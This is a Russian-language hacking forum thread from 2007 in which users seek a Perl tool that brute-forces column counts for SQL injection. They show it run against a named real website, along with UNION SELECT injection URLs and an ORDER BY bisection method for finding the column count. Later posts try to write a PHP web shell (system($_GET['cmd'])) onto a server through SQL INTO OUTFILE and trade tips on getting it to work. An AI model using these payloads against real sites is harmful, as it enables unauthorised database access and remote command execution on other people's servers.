http://www.google.ru/search?q=phpmyadmin+раскрытие+путей

нужен скрипт на perl'e который быстро подбирает количество столбцов при sql инекциях у кого есть пожалуйста выложите давно такой ищу

https://forum.antichat.ru/thread28461.html
https://forum.antichat.ru/threadnav24918-1-40.html

https://forum.antichat.ru/thread28461.html
по этой ссылке запускаю скрипт так
C:\sql\public>sql_check_111.pl -u "http://zonewm.biz/showa.php?id=129'"
мне выдает следующее

C:\sql\public>sql_check_111.pl -u "http://zonewm.biz/showa.php?id=129'"


=====_Script_Brut_Columns_=====

Wed Dec 26 16:59:16 2007

*URL:___________http://zonewm.biz/showa.php?id=129'
Evristic:______ON
Min_columns:___1
Max_columns:___50
Metod:_________UNION
SPACE:_________%20
NULL:__________1,2,3...
POST-GET:______GET
Time(sleep):___0
User-Agent:____useragent.txt
PROXY:_________proxy.txt
Log:___________log_check.txt

=====_Script_Brut_Columns_=====

GO!

Start evristic detection. Please, WAIT...

Detect MySQL

Start UNION SELECT

Please, wait...

Try 1 column...
------------------------

OK! Find 1 columns.

Right URL:
http://zonewm.biz/showa.php?id=129'%20UNION%20SELECT%201/*


что я не то делаю?

http://zonewm.biz/showa.php?id=12%20union%20select%201,2,3,4,5,6,7,8/* рукми лучше всего =)

дело в том что нужен скрипт ручками то я подобрал дело в том что встречаются сайты у которых по 80 строк ручками подбирать придется долго

алгоритм
-1+order+by+1/*
-1+order+by+100/* ошибка -> -1+order+by+50/* нет ошибки -> -1+order+by+75/* ошибка -> -1+order+by+61/*
итд...

heks, и логов меньше оставишь, и руку набьешь)))

блин давно эотел найти такой запрос пасиб AFoST

Никога так не заливал. Решил попробовать вот что выплюнул
Выставил права на 777 и сделал строку типа <? SQL: select <?system($_GET[cmd])?>
Тоже самое.

#1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '<?php system($_GET[cmd])?> into outfile '/www/sait.ru/php

<?system($_GET['cmd'])?>
Обрами в "ковычки"